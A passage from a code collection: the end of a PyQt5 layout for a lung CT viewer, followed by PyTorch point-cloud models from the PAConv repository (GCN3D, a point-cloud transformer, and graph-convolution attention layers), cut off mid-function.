brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.slide_show_label.setPalette(palette)
self.slide_show_label.setFrameShape(QtWidgets.QFrame.Box)
self.slide_show_label.setFrameShadow(QtWidgets.QFrame.Plain)
self.slide_show_label.setLineWidth(1)
self.slide_show_label.setText("")
self.slide_show_label.setObjectName("slide_show_label")
self.tableWidget = QtWidgets.QTableWidget(self.centralwidget)
self.tableWidget.setGeometry(QtCore.QRect(13, 630, 1211, 150))
self.tableWidget.setObjectName("tableWidget")
self.tableWidget.setColumnCount(0)
self.tableWidget.setRowCount(0)
self.sentenceWidget = QtWidgets.QTableWidget(self.centralwidget)
self.sentenceWidget.setGeometry(QtCore.QRect(13, 800, 1211, 150))
self.sentenceWidget.setObjectName("sentenceWidget")
self.sentenceWidget.setColumnCount(0)
self.sentenceWidget.setRowCount(0)
self.fileopen_progressBar = QtWidgets.QProgressBar(self.centralwidget)
self.fileopen_progressBar.setGeometry(QtCore.QRect(951, 574, 118, 23))
self.fileopen_progressBar.setProperty("value", 24)
self.fileopen_progressBar.setObjectName("fileopen_progressBar")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(674, 580, 51, 16))
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(890, 580, 59, 14))
self.label_2.setObjectName("label_2")
xai_viewer.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(xai_viewer)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1240, 19))
self.menubar.setObjectName("menubar")
self.menuMenu = QtWidgets.QMenu(self.menubar)
self.menuMenu.setObjectName("menuMenu")
xai_viewer.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(xai_viewer)
self.statusbar.setObjectName("statusbar")
xai_viewer.setStatusBar(self.statusbar)
self.actionOpen = QtWidgets.QAction(xai_viewer)
self.actionOpen.setObjectName("actionOpen")
self.actionSave = QtWidgets.QAction(xai_viewer)
self.actionSave.setObjectName("actionSave")
self.menuMenu.addSeparator()
self.menuMenu.addAction(self.actionOpen)
self.menubar.addAction(self.menuMenu.menuAction())
self.retranslateUi(xai_viewer)
QtCore.QMetaObject.connectSlotsByName(xai_viewer)
def retranslateUi(self, xai_viewer):
_translate = QtCore.QCoreApplication.translate
xai_viewer.setWindowTitle(_translate("xai_viewer", "XAI LUNG CT Viewer"))
self.prev_button.setText(_translate("xai_viewer", "prev"))
self.next_button.setText(_translate("xai_viewer", "next"))
self.slide_view_label.setText(_translate("xai_viewer", "Slide View 0"))
self.nodule_list_label.setText(_translate("xai_viewer", "nodule list"))
self.file_name.setText(_translate("xai_viewer", "file name"))
self.nodule_attribute_label.setText(_translate("xai_viewer", "nodule attribute"))
self.detect_button.setText(_translate("xai_viewer", "detect"))
self.label.setText(_translate("xai_viewer", "detect:"))
self.label_2.setText(_translate("xai_viewer", "fileopen:"))
self.menuMenu.setTitle(_translate("xai_viewer", "file"))
self.actionOpen.setText(_translate("xai_viewer", "open"))
self.actionSave.setText(_translate("xai_viewer", "save folder"))
``` |
{
"source": "JiazeWang/PAConv",
"score": 2
} |
#### File: obj_cls/cuda_lib/functional.py
```python
from . import functions
def assign_score_withk_halfkernel(score, point_input, knn_idx, aggregate='sum'):
return functions.assign_score_withk_halfkernel(score, point_input, knn_idx, aggregate)
def assign_score_withk(score, point_input, center_input, knn_idx, aggregate='sum'):
return functions.assign_score_withk(score, point_input, center_input, knn_idx, aggregate)
```
#### File: obj_cls/model/model_gcn3d.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import sys
sys.path.append("../")
import gcn3d
class GCN3D(nn.Module):
def __init__(self, support_num: int, neighbor_num: int):
super().__init__()
self.neighbor_num = neighbor_num
self.conv_0 = gcn3d.Conv_surface(kernel_num= 32, support_num= support_num)
self.conv_1 = gcn3d.Conv_layer(32, 64, support_num= support_num)
self.pool_1 = gcn3d.Pool_layer(pooling_rate= 4, neighbor_num= 4)
self.conv_2 = gcn3d.Conv_layer(64, 128, support_num= support_num)
self.conv_3 = gcn3d.Conv_layer(128, 256, support_num= support_num)
self.pool_2 = gcn3d.Pool_layer(pooling_rate= 4, neighbor_num= 4)
self.conv_4 = gcn3d.Conv_layer(256, 1024, support_num= support_num)
self.bn1 = nn.BatchNorm1d(64, affine=False)
self.bn2 = nn.BatchNorm1d(128, affine=False)
self.bn3 = nn.BatchNorm1d(256, affine=False)
self.bn4 = nn.BatchNorm1d(1024, affine=False)
self.d1 = nn.Conv1d(32, 64, kernel_size=1, bias=False)
self.d2 = nn.Conv1d(64, 128, kernel_size=1, bias=False)
self.d3 = nn.Conv1d(128, 256, kernel_size=1, bias=False)
self.d4 = nn.Conv1d(256, 1024, kernel_size=1, bias=False)
self.classifier = nn.Sequential(
nn.Linear(1024, 256),
nn.Dropout(0.3),
nn.BatchNorm1d(256),
nn.ReLU(inplace= False),
nn.Linear(256, 40)
)
def forward(self, vertices: "(bs, vertice_num, 3)"):
vertices = torch.transpose(vertices, 1, 2)
bs, vertice_num, _ = vertices.size()
neighbor_index = gcn3d.get_neighbor_index(vertices, self.neighbor_num)
fm_0 = self.conv_0(neighbor_index, vertices)
fm_0 = F.relu(fm_0, inplace= False)
residual1 = torch.transpose(self.d1(torch.transpose(fm_0, 1, 2)), 1, 2)
fm_1 = self.conv_1(neighbor_index, vertices, fm_0)
fm_1 = self.bn1(fm_1.transpose(2,1)).transpose(2, 1)
fm_1 = F.relu(fm_1, inplace= False)
fm_1 += residual1
#fm_1 = F.relu(fm_1, inplace= False)
vertices, fm_1 = self.pool_1(vertices, fm_1)
neighbor_index = gcn3d.get_neighbor_index(vertices, self.neighbor_num)
residual2 = torch.transpose(self.d2(torch.transpose(fm_1, 1, 2)), 1, 2)
fm_2 = self.conv_2(neighbor_index, vertices, fm_1)
fm_2 = self.bn2(fm_2.transpose(2,1)).transpose(2, 1)
fm_2 = F.relu(fm_2, inplace= False)
fm_2 += residual2
#fm_2 = F.relu(fm_2, inplace= False)
residual3 = torch.transpose(self.d3(torch.transpose(fm_2, 1, 2)), 1, 2)
fm_3 = self.conv_3(neighbor_index, vertices, fm_2)
fm_3 = self.bn3(fm_3.transpose(2,1)).transpose(2, 1)
fm_3 = F.relu(fm_3, inplace= False)
fm_3 += residual3
#fm_3 = F.relu(fm_3, inplace= False)
vertices, fm_3 = self.pool_2(vertices, fm_3)
neighbor_index = gcn3d.get_neighbor_index(vertices, self.neighbor_num)
residual4 = torch.transpose(self.d4(torch.transpose(fm_3, 1, 2)), 1, 2)
fm_4 = self.conv_4(neighbor_index, vertices, fm_3)
fm_4 = self.bn4(fm_4.transpose(2,1)).transpose(2, 1)
fm_4 = F.relu(fm_4, inplace= False)
fm_4 += residual4
feature_global = fm_4.max(1)[0]
pred = self.classifier(feature_global)
return pred
def parameter_number(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def test():
import time
sys.path.append("..")
#from util import parameter_number
device = torch.device('cuda:0')
points = torch.zeros(8, 1024, 3).to(device)
model = GCN3D(support_num= 1, neighbor_num= 20).to(device)
start = time.time()
output = model(points)
print("Inference time: {}".format(time.time() - start))
print("Parameter #: {}".format(parameter_number(model)))
print("Inputs size: {}".format(points.size()))
print("Output size: {}".format(output.size()))
if __name__ == '__main__':
test()
```
#### File: obj_cls/model/vit.py
```python
import torch
from torch import nn
from einops import rearrange, repeat
from einops.layers.torch import Rearrange
import sys
import numpy as np
sys.path.append("../")
from lib.pointops.functions import pointops
# helpers
class Encoder(nn.Module):
def __init__(self, encoder_channel):
super().__init__()
self.encoder_channel = encoder_channel
self.first_conv = nn.Sequential(
nn.Conv1d(3, 128, 1),
nn.BatchNorm1d(128),
nn.ReLU(inplace=True),
nn.Conv1d(128, 256, 1)
)
self.second_conv = nn.Sequential(
nn.Conv1d(512, 512, 1),
nn.BatchNorm1d(512),
nn.ReLU(inplace=True),
nn.Conv1d(512, self.encoder_channel, 1)
)
def forward(self, point_groups):
'''
point_groups : B G N 3
-----------------
feature_global : B G C
'''
bs, g, n , _ = point_groups.shape
point_groups = point_groups.reshape(bs * g, n, 3)
# encoder
feature = self.first_conv(point_groups.transpose(2,1)) # BG 256 n
feature_global = torch.max(feature,dim=2,keepdim=True)[0] # BG 256 1
feature = torch.cat([feature_global.expand(-1,-1,n), feature], dim=1)# BG 512 n
feature = self.second_conv(feature) # BG 1024 n
feature_global = torch.max(feature, dim=2, keepdim=False)[0] # BG 1024
return feature_global.reshape(bs, g, self.encoder_channel)
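# Shape sketch (illustrative sizes): with point_groups of shape
# (B=8, G=64, N=32, 3), first_conv lifts each group to (8*64, 256, 32), a
# per-group max pool gives a 256-d global code that is concatenated back onto
# every point (512 channels), and second_conv plus a final max pool yields
# feature_global of shape (8, 64, encoder_channel).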
def batched_index_select(values, indices):
last_dim = values.shape[-1]
return values.gather(1, indices[:, :, None].expand(-1, -1, last_dim))
def pair(t):
return t if isinstance(t, tuple) else (t, t)
# classes
def cluster_points(input, cluster_num = 4):
b, np, c = input.size()
lable = torch.zeros(b, np)
divide_x, index_x = torch.sort(input[:,:,0])
srt_x, rank_x = torch.sort(index_x)
divide_y, index_y = torch.sort(input[:,:,1])
srt_y, rank_y = torch.sort(index_y)
divide_z, index_z = torch.sort(input[:,:,2])
srt_z, rank_z = torch.sort(index_z)
index_x = torch.floor(rank_x/(np/cluster_num))
index_y = torch.floor(rank_y/(np/cluster_num))
index_z = torch.floor(rank_z/(np/cluster_num))
index_xyz = index_x*1+index_y*cluster_num+index_z*cluster_num*cluster_num
selet_index, index_index = torch.sort(index_xyz)
result = batched_index_select(input, index_index)
box_points = int(cluster_num*cluster_num*cluster_num)
box_num = int(np / box_points)
result = result.reshape(b, box_num, box_points * c)
return result
def sort_points(input):
b, np, c = input.size()
inputnew = input.clone()
inputnew[:,:,0] = inputnew[:,:,0]- input[:,:,0].min()
inputnew[:,:,1] = inputnew[:,:,1]- input[:,:,1].min()
inputnew[:,:,2] = inputnew[:,:,2]- input[:,:,2].min()
distance = inputnew[:,:,0] * inputnew[:,:,0] + inputnew[:,:,1] * inputnew[:,:,1]+inputnew[:,:,2] * inputnew[:,:,2]
sort_d, index_d = torch.sort(distance)
#print("index_d.shape", index_d.shape)
result = batched_index_select(input, index_d)
return result
class get_new_points(nn.Module):
def __init__(self,
num_clusters = 32,
num_neighbors = 32):
super(get_new_points, self).__init__()
self.num_clusters = num_clusters
self.num_neighbors = num_neighbors
self.grouper = pointops.QueryAndGroup(nsample=num_neighbors, use_xyz=True, return_xyz=True)
def forward(self, p1):
b, n, c = p1.size()
p1 = p1.contiguous()
p1_trans = p1.transpose(1, 2).contiguous() # (B, 3, N)
p2 = pointops.gathering(p1_trans, (pointops.furthestsampling(p1, self.num_clusters)).contiguous()).transpose(1, 2).contiguous()
p2 = sort_points(p2)
n_x = self.grouper(xyz=p1, new_xyz=p2).reshape(b, self.num_clusters, c * self.num_neighbors)
return n_x
class get_new_points_v2(nn.Module):
def __init__(self,
num_clusters = 32,
num_neighbors = 32):
super(get_new_points_v2, self).__init__()
self.num_clusters = num_clusters
self.num_neighbors = num_neighbors
self.grouper = pointops.QueryAndGroup(nsample=num_neighbors, use_xyz=True, return_xyz=True)
def forward(self, p1):
b, n, c = p1.size()
p1 = p1.contiguous()
p1_trans = p1.transpose(1, 2).contiguous() # (B, 3, N)
p2 = pointops.gathering(p1_trans, (pointops.furthestsampling(p1, self.num_clusters)).contiguous()).transpose(1, 2).contiguous()
p2 = sort_points(p2)
n_x = self.grouper(xyz=p1, new_xyz=p2)
n_x = n_x - p2.transpose(1, 2).unsqueeze(-1)
return n_x.permute(0, 2, 3, 1)
class PreNorm(nn.Module):
def __init__(self, dim, fn):
super().__init__()
self.norm = nn.LayerNorm(dim)
self.fn = fn
def forward(self, x, **kwargs):
return self.fn(self.norm(x), **kwargs)
class FeedForward(nn.Module):
def __init__(self, dim, hidden_dim, dropout = 0.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, hidden_dim),
nn.GELU(),
nn.Dropout(dropout),
nn.Linear(hidden_dim, dim),
nn.Dropout(dropout)
)
def forward(self, x):
return self.net(x)
class Attention(nn.Module):
def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.):
super().__init__()
inner_dim = dim_head * heads
project_out = not (heads == 1 and dim_head == dim)
self.heads = heads
self.scale = dim_head ** -0.5
self.attend = nn.Softmax(dim = -1)
self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False)
self.to_out = nn.Sequential(
nn.Linear(inner_dim, dim),
nn.Dropout(dropout)
) if project_out else nn.Identity()
def forward(self, x):
qkv = self.to_qkv(x).chunk(3, dim = -1)
q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv)
dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale
attn = self.attend(dots)
out = torch.matmul(attn, v)
out = rearrange(out, 'b h n d -> b n (h d)')
return self.to_out(out)
class Transformer(nn.Module):
def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.):
super().__init__()
self.layers = nn.ModuleList([])
for _ in range(depth):
self.layers.append(nn.ModuleList([
PreNorm(dim, Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout)),
PreNorm(dim, FeedForward(dim, mlp_dim, dropout = dropout))
]))
def forward(self, x):
for attn, ff in self.layers:
x = attn(x) + x
x = ff(x) + x
return x
class ViT(nn.Module):
def __init__(self, *, patch_point_num, num_patches, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 256, dropout = 0., emb_dropout = 0.):
super().__init__()
patch_dim = channels * patch_point_num
assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)'
self.emb = nn.Linear(patch_dim, dim)
self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim))
self.cls_token = nn.Parameter(torch.randn(1, 1, dim))
self.dropout = nn.Dropout(emb_dropout)
#self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)
self.Encoder = Encoder(encoder_channel = dim)
self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout)
self.pool = pool
self.to_latent = nn.Identity()
"""
self.mlp_head = nn.Sequential(
nn.LayerNorm(dim),
nn.Linear(dim, num_classes)
)
"""
self.mlp_head = nn.Sequential(
nn.LayerNorm(dim),
nn.Linear(dim, 256),
nn.ReLU(inplace=True),
nn.Dropout(0.5),
nn.Linear(256, num_classes)
)
self.get_new_points = get_new_points_v2(num_clusters = num_patches, num_neighbors = patch_point_num)
def forward(self, data, label=None, criterion=None):
data = data.transpose(1,2)
x = self.get_new_points(data)
#print("x.shape",x.shape)
x = self.Encoder(x)
#print("x.after_encoder",x.shape)
#x = self.emb(x)
b, n, _ = x.shape
cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b)
x = torch.cat((cls_tokens, x), dim=1)
x = x + self.pos_embedding[:, :(n + 1)]
x = self.dropout(x)
x = self.transformer(x)
x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0]
x = self.to_latent(x)
x = self.mlp_head(x)
if criterion is not None:
return x, criterion(x, label)
else:
return x
def parameter_number(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
if __name__ == '__main__':
model = ViT(patch_point_num=32, num_patches=64, num_classes=40, dim=256, depth=12, heads=6, mlp_dim=512).cuda()
print(parameter_number(model)/1000000)
points = torch.from_numpy(np.load("target.npy")).unsqueeze(0).contiguous().cuda()#.to(device)
points = points.transpose(1,2)
result = model(points)
print("final_result:", result.shape)
```
#### File: PAConv/part_seg/gcn3d_attention.py
```python
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
import copy
def get_neighbor_index(vertices: "(bs, vertice_num, 3)", neighbor_num: int):
"""
Return: (bs, vertice_num, neighbor_num)
"""
bs, v, _ = vertices.size()
device = vertices.device
inner = torch.bmm(vertices, vertices.transpose(1, 2)) #(bs, v, v)
quadratic = torch.sum(vertices**2, dim= 2) #(bs, v)
distance = inner * (-2) + quadratic.unsqueeze(1) + quadratic.unsqueeze(2)
neighbor_index = torch.topk(distance, k= neighbor_num + 1, dim= -1, largest= False)[1]
neighbor_index = neighbor_index[:, :, 1:]
return neighbor_index
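# The pairwise squared distance is expanded as
# ||p_i - p_j||^2 = ||p_i||^2 + ||p_j||^2 - 2 * <p_i, p_j>,
# which is what `inner * (-2) + quadratic.unsqueeze(1) + quadratic.unsqueeze(2)`
# computes without materializing the differences. topk asks for
# neighbor_num + 1 smallest distances because the closest "neighbor" of every
# point is the point itself (distance 0), which is then dropped by [:, :, 1:].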
def get_nearest_index(target: "(bs, v1, 3)", source: "(bs, v2, 3)"):
"""
Return: (bs, v1, 1)
"""
inner = torch.bmm(target, source.transpose(1, 2)) #(bs, v1, v2)
s_norm_2 = torch.sum(source ** 2, dim= 2) #(bs, v2)
t_norm_2 = torch.sum(target ** 2, dim= 2) #(bs, v1)
d_norm_2 = s_norm_2.unsqueeze(1) + t_norm_2.unsqueeze(2) - 2 * inner
nearest_index = torch.topk(d_norm_2, k= 1, dim= -1, largest= False)[1]
return nearest_index
def indexing_neighbor(tensor: "(bs, vertice_num, dim)", index: "(bs, vertice_num, neighbor_num)" ):
"""
Return: (bs, vertice_num, neighbor_num, dim)
"""
bs, v, n = index.size()
id_0 = torch.arange(bs).view(-1, 1, 1)
tensor_indexed = tensor[id_0, index]
return tensor_indexed
def get_neighbor_direction_norm(vertices: "(bs, vertice_num, 3)", neighbor_index: "(bs, vertice_num, neighbor_num)"):
"""
Return: (bs, vertice_num, neighbor_num, 3)
"""
neighbors = indexing_neighbor(vertices, neighbor_index) # (bs, v, n, 3)
neighbor_direction = neighbors - vertices.unsqueeze(2)
neighbor_direction_norm = F.normalize(neighbor_direction, dim= -1)
return neighbor_direction_norm
class Conv_surface(nn.Module):
"""Extract structure feafure from surface, independent from vertice coordinates"""
def __init__(self, kernel_num, support_num):
super().__init__()
self.kernel_num = kernel_num
self.support_num = support_num
self.relu = nn.ReLU(inplace= True)
self.directions = nn.Parameter(torch.FloatTensor(3, support_num * kernel_num))
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.support_num * self.kernel_num)
self.directions.data.uniform_(-stdv, stdv)
def forward(self,
neighbor_index: "(bs, vertice_num, neighbor_num)",
vertices: "(bs, vertice_num, 3)"):
"""
Return vertices with local feature: (bs, vertice_num, kernel_num)
"""
bs, vertice_num, neighbor_num = neighbor_index.size()
neighbor_direction_norm = get_neighbor_direction_norm(vertices, neighbor_index)
support_direction_norm = F.normalize(self.directions, dim= 0) #(3, s * k)
theta = neighbor_direction_norm @ support_direction_norm # (bs, vertice_num, neighbor_num, s*k)
theta = self.relu(theta)
theta = theta.contiguous().view(bs, vertice_num, neighbor_num, self.support_num, self.kernel_num)
theta = torch.max(theta, dim= 2)[0] # (bs, vertice_num, support_num, kernel_num)
feature = torch.sum(theta, dim= 2) # (bs, vertice_num, kernel_num)
return feature
def clones(module, N):
return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])
# simple self attention and simple RPE in PointFormer
# position_embedding (b,n,n)
# query / key / value (b,h,n,d)
def attention(query, key, value, mask=None, dropout=None, position_embedding=None):
d_k = query.size(-1)
# scores (b,h,n,n)
scores = torch.matmul(query, key.transpose(-2, -1).contiguous()) / math.sqrt(d_k)
if mask is not None:
scores = scores.masked_fill(mask == 0, -1e9)
if position_embedding is not None:
position_embedding = position_embedding.unsqueeze(1)
scores = scores + position_embedding
p_attn = F.softmax(scores, dim=-1)
return torch.matmul(p_attn, value), p_attn
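# Shape sketch for the scaled dot-product attention above (illustrative):
# query/key/value are (b, h, n, d); scores = q @ k^T / sqrt(d) has shape
# (b, h, n, n); an optional position_embedding of shape (b, n, n) is
# unsqueezed to (b, 1, n, n) so it broadcasts across heads; softmax over the
# last dimension gives p_attn, and p_attn @ value returns to (b, h, n, d).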
class MultiHeadedAttention(nn.Module):
def __init__(self, h, d_model, fn_attention=attention, dropout=0.1):
"Take in model size and number of heads."
super(MultiHeadedAttention, self).__init__()
assert d_model % h == 0
# We assume d_v always equals d_k
self.d_model = d_model
self.d_k = d_model // h
self.h = h
self.linears = clones(nn.Linear(d_model, d_model), 4)
self.fn_attention = fn_attention
self.attn = None
self.dropout = None
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.d_model * self.d_model)
for linear in self.linears:
linear.weight.data.uniform_(-stdv, stdv)
def forward(self, query, key, value):
nbatches = query.size(0)
# 1) Do all the linear projections in batch from d_model => h x d_k
query, key, value = \
[l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2).contiguous()
for l, x in zip(self.linears, (query, key, value))]
# 2) Apply attention on all the projected vectors in batch.
#x, self.attn = attention(query, key, value, mask=mask,
# dropout=self.dropout, position_embedding=position_embedding)
x, self.attn = self.fn_attention(query, key, value, dropout=self.dropout)
# 3) "Concat" using a view and apply a final linear.
x = x.transpose(1, 2).contiguous() \
.view(nbatches, -1, self.h * self.d_k)
return self.linears[-1](x)
class Attention_Conv_surface(nn.Module):
def __init__(self, kernel_num, support_num):
super().__init__()
self.kernel_num = kernel_num
self.support_num = support_num
self.relu = nn.ReLU(inplace= True)
self.query_directions = nn.Parameter(torch.FloatTensor(3, support_num * kernel_num))
self.value_directions = nn.Parameter(torch.FloatTensor(3, support_num * kernel_num))
self.key_directions = nn.Parameter(torch.FloatTensor(3, support_num * kernel_num))
self.multihead_attention = MultiHeadedAttention(4, kernel_num, fn_attention=attention)
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.support_num * self.kernel_num)
self.query_directions.data.uniform_(-stdv, stdv)
self.value_directions.data.uniform_(-stdv, stdv)
self.key_directions.data.uniform_(-stdv, stdv)
def forward(self,
neighbor_index: "(bs, vertice_num, neighbor_num)",
vertices: "(bs, vertice_num, 3)"):
bs, vertice_num, neighbor_num = neighbor_index.size()
neighbor_direction_norm = get_neighbor_direction_norm(vertices, neighbor_index)
support_query_direction_norm = F.normalize(self.query_directions, dim= 0) #(3, s * k)
support_key_direction_norm = F.normalize(self.key_directions, dim= 0) #(3, s * k)
support_value_direction_norm = F.normalize(self.value_directions, dim= 0) #(3, s * k)
query_theta = neighbor_direction_norm @ support_query_direction_norm # (bs, vertice_num, neighbor_num, s*k)
query_theta = self.relu(query_theta)
query_theta = query_theta.contiguous().view(bs, vertice_num, neighbor_num, self.support_num, self.kernel_num)
query_theta = torch.max(query_theta, dim= 2)[0] # (bs, vertice_num, support_num, kernel_num)
query_theta = torch.sum(query_theta, dim= 2) # (bs, vertice_num, kernel_num)
key_theta = neighbor_direction_norm @ support_key_direction_norm # (bs, vertice_num, neighbor_num, s*k)
key_theta = self.relu(key_theta)
key_theta = key_theta.contiguous().view(bs, vertice_num, neighbor_num, self.support_num, self.kernel_num)
key_theta = torch.max(key_theta, dim= 2)[0] # (bs, vertice_num, support_num, kernel_num)
key_theta = torch.sum(key_theta, dim= 2) # (bs, vertice_num, kernel_num)
value_theta = neighbor_direction_norm @ support_value_direction_norm # (bs, vertice_num, neighbor_num, s*k)
value_theta = self.relu(value_theta)
value_theta = value_theta.contiguous().view(bs, vertice_num, neighbor_num, self.support_num, self.kernel_num)
value_theta = torch.max(value_theta, dim= 2)[0] # (bs, vertice_num, support_num, kernel_num)
value_theta = torch.sum(value_theta, dim= 2) # (bs, vertice_num, kernel_num)
feature = self.multihead_attention(query_theta, key_theta, value_theta)
return feature
class Attention_Conv_surface2(nn.Module):
def __init__(self, kernel_num, support_num):
super().__init__()
self.kernel_num = kernel_num
self.support_num = support_num
self.relu = nn.ReLU(inplace= True)
self.directions = nn.Parameter(torch.FloatTensor(3, support_num * kernel_num))
self.multihead_attention = MultiHeadedAttention(4, kernel_num, fn_attention=attention)
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.support_num * self.kernel_num)
self.directions.data.uniform_(-stdv, stdv)
def forward(self,
neighbor_index: "(bs, vertice_num, neighbor_num)",
vertices: "(bs, vertice_num, 3)"):
bs, vertice_num, neighbor_num = neighbor_index.size()
neighbor_direction_norm = get_neighbor_direction_norm(vertices, neighbor_index)
support_direction_norm = F.normalize(self.directions, dim= 0) #(3, s * k)
theta = neighbor_direction_norm @ support_direction_norm
theta = self.relu(theta).contiguous().view(bs, vertice_num, neighbor_num, self.support_num, self.kernel_num)
theta = torch.max(theta, dim= 2)[0] # (bs, vertice_num, support_num, kernel_num)
theta = torch.sum(theta, dim= 2) # (bs, vertice_num, kernel_num)
attention_theta = self.multihead_attention(theta, theta, theta)
return attention_theta
class Conv_layer(nn.Module):
def __init__(self, in_channel, out_channel, support_num):
super().__init__()
# arguments:
self.in_channel = in_channel
self.out_channel = out_channel
self.support_num = support_num
# parameters:
self.relu = nn.ReLU(inplace= True)
self.weights = nn.Parameter(torch.FloatTensor(in_channel, (support_num + 1) * out_channel))
self.bias = nn.Parameter(torch.FloatTensor((support_num + 1) * out_channel))
self.directions = nn.Parameter(torch.FloatTensor(3, support_num * out_channel))
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.out_channel * (self.support_num + 1))
self.weights.data.uniform_(-stdv, stdv)
self.bias.data.uniform_(-stdv, stdv)
self.directions.data.uniform_(-stdv, stdv)
def forward(self,
neighbor_index: "(bs, vertice_num, neighbor_index)",
vertices: "(bs, vertice_num, 3)",
feature_map: "(bs, vertice_num, in_channel)"):
"""
Return: output feature map: (bs, vertice_num, out_channel)
"""
bs, vertice_num, neighbor_num = neighbor_index.size()
neighbor_direction_norm = get_neighbor_direction_norm(vertices, neighbor_index)
support_direction_norm = F.normalize(self.directions, dim= 0)
theta = neighbor_direction_norm @ support_direction_norm # (bs, vertice_num, neighbor_num, support_num * out_channel)
theta = self.relu(theta)
theta = theta.contiguous().view(bs, vertice_num, neighbor_num, -1)
# (bs, vertice_num, neighbor_num, support_num * out_channel)
feature_out = feature_map @ self.weights + self.bias # (bs, vertice_num, (support_num + 1) * out_channel)
feature_center = feature_out[:, :, :self.out_channel] # (bs, vertice_num, out_channel)
feature_support = feature_out[:, :, self.out_channel:] #(bs, vertice_num, support_num * out_channel)
# Fuse together - max among product
feature_support = indexing_neighbor(feature_support, neighbor_index) # (bs, vertice_num, neighbor_num, support_num * out_channel)
activation_support = theta * feature_support # (bs, vertice_num, neighbor_num, support_num * out_channel)
activation_support = activation_support.view(bs,vertice_num, neighbor_num, self.support_num, self.out_channel)
activation_support = torch.max(activation_support, dim= 2)[0] # (bs, vertice_num, support_num, out_channel)
activation_support = torch.sum(activation_support, dim= 2) # (bs, vertice_num, out_channel)
feature_fuse = feature_center + activation_support # (bs, vertice_num, out_channel)
return feature_fuse
class Attention_Conv_layer_V2(nn.Module):
def __init__(self, in_channel, out_channel, support_num):
super().__init__()
# arguments:
self.in_channel = in_channel
self.out_channel = out_channel
self.support_num = support_num
# parameters:
self.relu = nn.ReLU(inplace= True)
self.weights = nn.Parameter(torch.FloatTensor(in_channel, (support_num + 1) * out_channel))
self.bias = nn.Parameter(torch.FloatTensor((support_num + 1) * out_channel))
self.directions = nn.Parameter(torch.FloatTensor(3, support_num * out_channel))
self.multihead_attention = MultiHeadedAttention(4, out_channel, fn_attention=attention)
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.out_channel * (self.support_num + 1))
self.weights.data.uniform_(-stdv, stdv)
self.bias.data.uniform_(-stdv, stdv)
self.directions.data.uniform_(-stdv, stdv)
def forward(self,
neighbor_index: "(bs, vertice_num, neighbor_index)",
vertices: "(bs, vertice_num, 3)",
feature_map: "(bs, vertice_num, in_channel)"):
"""
Return: output feature map: (bs, vertice_num, out_channel)
"""
bs, vertice_num, neighbor_num = neighbor_index.size()
neighbor_direction_norm = get_neighbor_direction_norm(vertices, neighbor_index)
support_direction_norm = F.normalize(self.directions, dim= 0)
theta = neighbor_direction_norm @ support_direction_norm # (bs, vertice_num, neighbor_num, support_num * out_channel)
theta = self.relu(theta)
theta = theta.contiguous().view(bs, vertice_num, neighbor_num, -1)
# (bs, vertice_num, neighbor_num, support_num * out_channel)
feature_out = feature_map @ self.weights + self.bias # (bs, vertice_num, (support_num + 1) * out_channel)
feature_center = feature_out[:, :, :self.out_channel] # (bs, vertice_num, out_channel)
